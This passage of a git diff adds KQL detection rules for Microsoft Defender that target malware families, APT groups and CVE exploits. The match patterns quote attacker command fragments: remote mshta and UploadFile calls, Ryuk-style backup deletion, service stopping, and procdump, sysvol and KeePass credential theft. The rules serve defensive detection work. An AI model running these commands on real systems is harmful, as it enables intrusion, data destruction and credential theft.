+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql b/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql
new file mode 100644
index 00000000..3f2876f4
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql
@@ -0,0 +1,10 @@
+// Title: Defrag Deactivation
+// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
+// Date: 2019-03-04
+// Level: medium
+// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/change") and (ProcessCommandLine contains "/TN" and ProcessCommandLine contains "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql
new file mode 100644
index 00000000..a2602890
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql
@@ -0,0 +1,10 @@
+// Title: TropicTrooper Campaign November 2018
+// Author: @41thexplorer, Microsoft Defender ATP
+// Date: 2019-11-12
+// Level: high
+// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql
new file mode 100644
index 00000000..3f5da515
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql
@@ -0,0 +1,10 @@
+// Title: Potential BearLPE Exploitation
+// Author: Olaf Hartong
+// Date: 2019-05-22
+// Level: high
+// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/RP") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql
new file mode 100644
index 00000000..ea8f29ac
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql
@@ -0,0 +1,10 @@
+// Title: Exploiting SetupComplete.cmd CVE-2019-1378
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-11-15
+// Level: high
+// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "\\cmd.exe" and InitiatingProcessCommandLine contains "/c" and InitiatingProcessCommandLine contains "C:\\Windows\\Setup\\Scripts\\") and (InitiatingProcessCommandLine endswith "SetupComplete.cmd" or InitiatingProcessCommandLine endswith "PartnerSetupComplete.cmd")) and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\Setup\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql
new file mode 100644
index 00000000..58f0233d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql
@@ -0,0 +1,10 @@
+// Title: Exploiting CVE-2019-1388
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-11-20
+// Level: critical
+// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " http" and FolderPath endswith "\\iexplore.exe" and InitiatingProcessFolderPath endswith "\\consent.exe") and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql
new file mode 100644
index 00000000..3d48787e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql
@@ -0,0 +1,12 @@
+// Title: Sudo Privilege Escalation CVE-2019-14287
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-15
+// Level: high
+// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -u#"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql
new file mode 100644
index 00000000..9b01ee53
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Baby Shark Malware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-24
+// Level: high
+// Description: Detects activity that could be related to Baby Shark malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell.exe mshta.exe http" and ProcessCommandLine contains ".hta") or (ProcessCommandLine contains "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" or ProcessCommandLine contains "cmd.exe /c taskkill /im cmd.exe" or ProcessCommandLine contains "(New-Object System.Net.WebClient).UploadFile('http")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql
new file mode 100644
index 00000000..58010ff5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Dridex Activity
+// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-10
+// Level: critical
+// Description: Detects potential Dridex acitvity via specific process patterns
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") and FolderPath endswith "\\svchost.exe") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"))) or (((ProcessCommandLine contains " -s " or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and FolderPath endswith "\\regsvr32.exe" and InitiatingProcessFolderPath endswith "\\excel.exe") and (not(ProcessCommandLine contains ".dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and ((ProcessCommandLine contains " /all" and FolderPath endswith "\\whoami.exe") or (ProcessCommandLine contains " view" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql
new file mode 100644
index 00000000..525b7597
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Dtrack RAT Activity
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-30
+// Level: critical
+// Description: Detects potential Dtrack RAT activity via specific process patterns
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\temp\\res.ip" and ProcessCommandLine matches regex "ipconfig\\s+/all") or (ProcessCommandLine contains "interface ip show config" and ProcessCommandLine contains "\\temp\\netsh.res") or ProcessCommandLine matches regex "ping\\s+-n.{6,64}echo EEEE\\s?>\\s?"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql
new file mode 100644
index 00000000..b23c06eb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Emotet Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-09-30
+// Level: high
+// Description: Detects all Emotet like process executions that are not covered by the more generic rules
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or ProcessCommandLine contains "JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ" or ProcessCommandLine contains "QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA" or ProcessCommandLine contains "kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA" or ProcessCommandLine contains "IgAoACcAKgAnACkAOwAkA" or ProcessCommandLine contains "IAKAAnACoAJwApADsAJA" or ProcessCommandLine contains "iACgAJwAqACcAKQA7ACQA" or ProcessCommandLine contains "JABGAGwAeAByAGgAYwBmAGQ" or ProcessCommandLine contains "PQAkAGUAbgB2ADoAdABlAG0AcAArACgA" or ProcessCommandLine contains "0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA" or ProcessCommandLine contains "9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA") and (not((ProcessCommandLine contains "fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ" or ProcessCommandLine contains "wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA" or ProcessCommandLine contains "8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql b/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql
new file mode 100644
index 00000000..cdac7d56
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql
@@ -0,0 +1,10 @@
+// Title: Formbook Process Creation
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-30
+// Level: high
+// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine endswith ".exe" and (InitiatingProcessCommandLine startswith "C:\\Windows\\System32\\" or InitiatingProcessCommandLine startswith "C:\\Windows\\SysWOW64\\")) and ((ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") or (ProcessCommandLine contains "/C" and ProcessCommandLine contains "type nul >" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\")) and ProcessCommandLine endswith ".exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql
new file mode 100644
index 00000000..d60a2944
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: LockerGoga Ransomware Activity
+// Author: Vasiliy Burov, oscd.community
+// Date: 2020-10-18
+// Level: critical
+// Description: Detects LockerGoga ransomware activity via specific command line.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-i SM-tgytutrc -s"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql b/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql
new file mode 100644
index 00000000..8a791bae
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential QBot Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-01
+// Level: critical
+// Description: Detects potential QBot activity by looking for process executions used previously by QBot
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wscript.exe" and InitiatingProcessFolderPath endswith "\\WinRAR.exe") or ProcessCommandLine contains " /c ping.exe -n 6 127.0.0.1 & type " or (ProcessCommandLine contains "regsvr32.exe" and ProcessCommandLine contains "C:\\ProgramData" and ProcessCommandLine contains ".tmp")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql
new file mode 100644
index 00000000..35534de5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Ryuk Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-12-16
+// Level: high
+// Description: Detects Ryuk ransomware activity
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del /s /f /q c:\\" and ProcessCommandLine contains "*.bac" and ProcessCommandLine contains "*.bak" and ProcessCommandLine contains "*.bkf") or ((ProcessCommandLine contains "samss" or ProcessCommandLine contains "audioendpointbuilder" or ProcessCommandLine contains "unistoresvc_" or ProcessCommandLine contains "AcrSch2Svc") and (ProcessCommandLine contains " stop " and ProcessCommandLine contains " /y") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "C:\\users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql
new file mode 100644
index 00000000..49bbc955
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Snatch Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-08-26
+// Level: high
+// Description: Detects specific process characteristics of Snatch ransomware word document droppers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+//   - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "shutdown\\s+/r /f /t 00" or ProcessCommandLine matches regex "net\\s+stop SuperBackupMan"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql
new file mode 100644
index 00000000..84dec431
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ursnif Malware Activity - Registry
+// Author: megan201296
+// Date: 2019-02-13
+// Level: high
+// Description: Detects registry keys related to Ursnif malware.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
new file mode 100644
index 00000000..d73050a1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
@@ -0,0 +1,10 @@
+// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
+// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-02
+// Level: medium
+// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "\\AppData\\Local\\" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains ",DllEntry"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql
new file mode 100644
index 00000000..58cd05f6
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql
@@ -0,0 +1,12 @@
+// Title: APT31 Judgement Panda Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-21
+// Level: critical
+// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\aaaa\\procdump64.exe" or ProcessCommandLine contains "\\aaaa\\netsess.exe" or ProcessCommandLine contains "\\aaaa\\7za.exe" or ProcessCommandLine contains "\\c$\\aaaa\\") and (ProcessCommandLine contains "copy \\\\" and ProcessCommandLine contains "c$")) or (ProcessCommandLine contains "ldifde" and ProcessCommandLine contains "-f -n" and ProcessCommandLine contains "eprod.ldf")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql
new file mode 100644
index 00000000..047815fc
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Russian APT Credential Theft Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-21
+// Level: critical
+// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "adexplorer -snapshot \"\" c:\\users\\" and ProcessCommandLine contains "\\downloads\\" and ProcessCommandLine contains ".snp") or (ProcessCommandLine contains "xcopy /S /E /C /Q /H \\\\" and ProcessCommandLine contains "\\sysvol\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql
new file mode 100644
index 00000000..b76c6179
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential EmpireMonkey Activity
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-04-02
+// Level: high
+// Description: Detects potential EmpireMonkey APT activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/e:jscript" and ProcessCommandLine contains "\\Local\\Temp\\Errors.bat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql
new file mode 100644
index 00000000..89bb9933
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql
@@ -0,0 +1,12 @@
+// Title: Equation Group DLL_U Export Function Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-03-04
+// Level: critical
+// Description: Detects a specific export function name used by one of EquationGroup tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-export dll_u" or (ProcessCommandLine endswith ",dll_u" or ProcessCommandLine endswith " dll_u")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql
new file mode 100644
index 00000000..6cb47e3b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql
@@ -0,0 +1,12 @@
+// Title: Mustang Panda Dropper
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2019-10-30
+// Level: high
+// Description: Detects specific process parameters as used by Mustang Panda droppers
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Temp\\wtask.exe /create" or ProcessCommandLine contains "%windir:~-3,1%%PUBLIC:~-9,1%" or ProcessCommandLine contains "/tn \"Security Script " or ProcessCommandLine contains "%windir:~-1,1%") or (ProcessCommandLine contains "/E:vbscript" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains ".txt" and ProcessCommandLine contains "/F")) or FolderPath endswith "Temp\\winwsh.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql b/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql
new file mode 100644
index 00000000..f220cfaa
--- /dev/null
+++ b/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql
@@ -0,0 +1,12 @@
+// Title: Operation Wocao Activity
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2019-12-20
+// Level: high
+// Description: Detects activity mentioned in Operation Wocao report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats
+// False Positives:
+//   - Administrators that use checkadmin.exe tool to enumerate local administrators
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "checkadmin.exe 127.0.0.1 -all" or ProcessCommandLine contains "netsh advfirewall firewall add rule name=powershell dir=in" or ProcessCommandLine contains "cmd /c powershell.exe -ep bypass -file c:\\s.ps1" or ProcessCommandLine contains "/tn win32times /f" or ProcessCommandLine contains "create win32times binPath=" or ProcessCommandLine contains "\\c$\\windows\\system32\\devmgr.dll" or ProcessCommandLine contains " -exec bypass -enc JgAg" or (ProcessCommandLine contains "type " and ProcessCommandLine contains "keepass\\KeePass.config.xml") or ProcessCommandLine contains "iie.exe iie.txt" or (ProcessCommandLine contains "reg query HKEY_CURRENT_USER\\Software\\" and ProcessCommandLine contains "\\PuTTY\\Sessions\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql
new file mode 100644
index 00000000..af860080
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql
@@ -0,0 +1,10 @@
+// Title: Exploited CVE-2020-10189 Zoho ManageEngine
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-03-25
+// Level: high
+// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "DesktopCentral_Server\\jre\\bin\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
new file mode 100644
index 00000000..24dc5f58
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
@@ -0,0 +1,13 @@
+// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
+// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO
+// Date: 2020-05-13
+// Level: high
+// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
+// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
+// MITRE Tactic: Persistence
